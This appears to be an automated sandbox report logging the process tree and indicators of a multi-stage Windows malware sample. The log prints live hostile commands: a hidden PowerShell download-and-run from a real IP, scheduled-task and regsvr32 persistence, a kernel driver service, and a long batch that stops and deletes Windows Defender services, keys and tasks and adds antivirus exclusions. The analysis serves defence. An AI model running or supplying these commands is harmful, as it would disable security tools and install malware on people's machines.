Token: SeDebugPrivilege	4316	PowerShell.exe
Token: SeSystemEnvironmentPrivilege	4316	PowerShell.exe
Token: SeRemoteShutdownPrivilege	4316	PowerShell.exe
Token: SeUndockPrivilege	4316	PowerShell.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
1976	2025-03-31_f0d59ff93c834b4dd9c70423cf0d8ef4_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1976	2025-03-31_f0d59ff93c834b4dd9c70423cf0d8ef4_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1976	2025-03-31_f0d59ff93c834b4dd9c70423cf0d8ef4_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
4044	TempADFRKSDIPJJWXMR0JE7SYKTAYYJZKG1E.EXE
312	Bell_Setup16.tmp

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
1976	2025-03-31_f0d59ff93c834b4dd9c70423cf0d8ef4_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1976	2025-03-31_f0d59ff93c834b4dd9c70423cf0d8ef4_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1976	2025-03-31_f0d59ff93c834b4dd9c70423cf0d8ef4_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1976 wrote to memory of 3732	1976	2025-03-31_f0d59ff93c834b4dd9c70423cf0d8ef4_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 1976 wrote to memory of 3732	1976	2025-03-31_f0d59ff93c834b4dd9c70423cf0d8ef4_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 1976 wrote to memory of 3732	1976	2025-03-31_f0d59ff93c834b4dd9c70423cf0d8ef4_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 1976 wrote to memory of 2032	1976	2025-03-31_f0d59ff93c834b4dd9c70423cf0d8ef4_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 1976 wrote to memory of 2032	1976	2025-03-31_f0d59ff93c834b4dd9c70423cf0d8ef4_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 1976 wrote to memory of 2032	1976	2025-03-31_f0d59ff93c834b4dd9c70423cf0d8ef4_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 3732 wrote to memory of 4068	3732	cmd.exe	90
PID 3732 wrote to memory of 4068	3732	cmd.exe	90
PID 3732 wrote to memory of 4068	3732	cmd.exe	90
PID 2032 wrote to memory of 2824	2032	mshta.exe	92
PID 2032 wrote to memory of 2824	2032	mshta.exe	92
PID 2032 wrote to memory of 2824	2032	mshta.exe	92
PID 2824 wrote to memory of 4044	2824	powershell.exe	100
PID 2824 wrote to memory of 4044	2824	powershell.exe	100
PID 2824 wrote to memory of 4044	2824	powershell.exe	100
PID 4044 wrote to memory of 4548	4044	TempADFRKSDIPJJWXMR0JE7SYKTAYYJZKG1E.EXE	104
PID 4044 wrote to memory of 4548	4044	TempADFRKSDIPJJWXMR0JE7SYKTAYYJZKG1E.EXE	104
PID 4044 wrote to memory of 4548	4044	TempADFRKSDIPJJWXMR0JE7SYKTAYYJZKG1E.EXE	104
PID 4548 wrote to memory of 1732	4548	rapes.exe	108
PID 4548 wrote to memory of 1732	4548	rapes.exe	108
PID 1732 wrote to memory of 208	1732	h2kC2YI.exe	109
PID 1732 wrote to memory of 208	1732	h2kC2YI.exe	109
PID 1732 wrote to memory of 208	1732	h2kC2YI.exe	109
PID 1732 wrote to memory of 2496	1732	h2kC2YI.exe	110
PID 1732 wrote to memory of 2496	1732	h2kC2YI.exe	110
PID 1732 wrote to memory of 2496	1732	h2kC2YI.exe	110
PID 1732 wrote to memory of 2496	1732	h2kC2YI.exe	110
PID 1732 wrote to memory of 2496	1732	h2kC2YI.exe	110
PID 1732 wrote to memory of 2496	1732	h2kC2YI.exe	110
PID 1732 wrote to memory of 2496	1732	h2kC2YI.exe	110
PID 1732 wrote to memory of 2496	1732	h2kC2YI.exe	110
PID 1732 wrote to memory of 2496	1732	h2kC2YI.exe	110
PID 4548 wrote to memory of 1936	4548	rapes.exe	111
PID 4548 wrote to memory of 1936	4548	rapes.exe	111
PID 1936 wrote to memory of 4572	1936	SPOKz5U.exe	112
PID 1936 wrote to memory of 4572	1936	SPOKz5U.exe	112
PID 1936 wrote to memory of 4572	1936	SPOKz5U.exe	112
PID 1936 wrote to memory of 2836	1936	SPOKz5U.exe	113
PID 1936 wrote to memory of 2836	1936	SPOKz5U.exe	113
PID 1936 wrote to memory of 2836	1936	SPOKz5U.exe	113
PID 1936 wrote to memory of 2836	1936	SPOKz5U.exe	113
PID 1936 wrote to memory of 2836	1936	SPOKz5U.exe	113
PID 1936 wrote to memory of 2836	1936	SPOKz5U.exe	113
PID 1936 wrote to memory of 2836	1936	SPOKz5U.exe	113
PID 1936 wrote to memory of 2836	1936	SPOKz5U.exe	113
PID 1936 wrote to memory of 2836	1936	SPOKz5U.exe	113
PID 4548 wrote to memory of 380	4548	rapes.exe	114
PID 4548 wrote to memory of 380	4548	rapes.exe	114
PID 380 wrote to memory of 2176	380	aezyEBW.exe	115
PID 380 wrote to memory of 2176	380	aezyEBW.exe	115
PID 380 wrote to memory of 2176	380	aezyEBW.exe	115
PID 380 wrote to memory of 2176	380	aezyEBW.exe	115
PID 380 wrote to memory of 2176	380	aezyEBW.exe	115
PID 380 wrote to memory of 2176	380	aezyEBW.exe	115
PID 380 wrote to memory of 2176	380	aezyEBW.exe	115
PID 380 wrote to memory of 2176	380	aezyEBW.exe	115
PID 380 wrote to memory of 2176	380	aezyEBW.exe	115
PID 4548 wrote to memory of 4456	4548	rapes.exe	117
PID 4548 wrote to memory of 4456	4548	rapes.exe	117
PID 4548 wrote to memory of 4456	4548	rapes.exe	117
PID 4456 wrote to memory of 2188	4456	apple.exe	118
PID 4456 wrote to memory of 2188	4456	apple.exe	118
PID 4456 wrote to memory of 2188	4456	apple.exe	118
PID 684 wrote to memory of 1324	684	cmd.exe	122

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2025-03-31_f0d59ff93c834b4dd9c70423cf0d8ef4_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-03-31_f0d59ff93c834b4dd9c70423cf0d8ef4_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1976
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn P2iW4macXbx /tr "mshta C:\Users\Admin\AppData\Local\Temp\2pdv1Emfs.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3732
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn P2iW4macXbx /tr "mshta C:\Users\Admin\AppData\Local\Temp\2pdv1Emfs.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4068
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\2pdv1Emfs.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2032
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ADFRKSDIPJJWXMR0JE7SYKTAYYJZKG1E.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2824
  - - C:\Users\Admin\AppData\Local\TempADFRKSDIPJJWXMR0JE7SYKTAYYJZKG1E.EXE
      "C:\Users\Admin\AppData\Local\TempADFRKSDIPJJWXMR0JE7SYKTAYYJZKG1E.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:4044
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4548
      - C:\Users\Admin\AppData\Local\Temp\10382310101\h2kC2YI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10382310101\h2kC2YI.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:1732
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:208
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2496
      - C:\Users\Admin\AppData\Local\Temp\10382540101\SPOKz5U.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10382540101\SPOKz5U.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:1936
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:4572
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2836
      - C:\Users\Admin\AppData\Local\Temp\10382800101\aezyEBW.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10382800101\aezyEBW.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:380
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2176
      - C:\Users\Admin\AppData\Local\Temp\10382880101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10382880101\apple.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4456
        
        C:\Users\Admin\AppData\Local\Temp\221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\221.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2188
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FBA6.tmp\FBA7.tmp\FBA8.bat C:\Users\Admin\AppData\Local\Temp\221.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:684
        
        C:\Users\Admin\AppData\Local\Temp\221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\221.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1324
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FC71.tmp\FC72.tmp\FC73.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"
        10⤵
        Drops file in Program Files directory
        
        PID:3260
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:2192
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:3692
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:2460
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:1796
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:3540
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:668
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2200
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:1056
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:3212
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:2544
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:3680
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:400
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:3440
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:3172
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:3488
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:5092
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:3384
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:4644
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:5056
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:3828
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:3884
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        Modifies security service
        
        PID:2716
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:3840
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:4128
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:4180
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:4184
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:880
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:4028
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:3296
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:1640
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:2356
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:3020
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:2492
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:2348
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:1452
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:380
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:3048
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:4788
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:700
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:2920
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:4804
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:3916
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:2136
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:448
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:1240
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:4516
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:832
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:1596
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:2932
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:4568
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:3408
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:1400
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:4280
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:3504
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:4332
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:1412
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:3040
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:1500
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:3176
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:1832
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:1464
      - C:\Users\Admin\AppData\Local\Temp\10384640101\BCmr6Ki.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10384640101\BCmr6Ki.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1384
      - C:\Users\Admin\AppData\Local\Temp\10385100101\JmKitiE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10385100101\JmKitiE.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:744
      - C:\Users\Admin\AppData\Local\Temp\10385170101\nAM5wkr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10385170101\nAM5wkr.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:4444
        
        C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe" WindowsControl ENABLE & exit
        7⤵
        
        PID:3692
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft Cloud" /tr "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe" /RL HIGHEST & exit
        7⤵
        
        PID:2432
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc minute /mo 1 /tn "Microsoft Cloud" /tr "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe" /RL HIGHEST
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3576
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Microsoft DotNet Kernel" /tr "C:\Users\Admin\AppData\Roaming\xdwdmicrosoft.exe" /RL HIGHEST & exit
        7⤵
        
        PID:4644
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc minute /mo 30 /tn "Microsoft DotNet Kernel" /tr "C:\Users\Admin\AppData\Roaming\xdwdmicrosoft.exe" /RL HIGHEST
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4392
        
        C:\Users\Admin\AppData\Roaming\xdwdkernel.exe
        
        "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2916
      - C:\Users\Admin\AppData\Local\Temp\10385660101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10385660101\amnew.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2348
        
        C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        7⤵
        Downloads MZ/PE file
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2120
        
        C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        8⤵
        Executes dropped EXE
        
        PID:4572
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:4596
        
        C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4464
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:4652
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1836
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3828
        
        C:\Users\Admin\AppData\Local\Temp\is-FLRJM.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FLRJM.tmp\Bell_Setup16.tmp" /SL5="$B02A4,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:960
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        10⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2472
        
        C:\Users\Admin\AppData\Local\Temp\is-FAR51.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FAR51.tmp\Bell_Setup16.tmp" /SL5="$150030,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        11⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:312
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"
        12⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3512
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:828
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
        
        "PowerShell.exe" -NoProfile -NonInteractive -Command -
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4316
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:448
        
        C:\Users\Admin\AppData\Local\Temp\10045350101\kololololo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10045350101\kololololo.exe"
        8⤵
        
        PID:2248
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:2432
        
        C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"
        8⤵
        
        PID:2236
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:4712
        
        C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
        8⤵
        
        PID:2532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1060
        
        C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
        
        C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
        9⤵
        
        PID:1932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3912
        
        C:\Users\Admin\AppData\Local\Temp\10045720101\b54ce0e752.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10045720101\b54ce0e752.exe"
        8⤵
        
        PID:5028
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
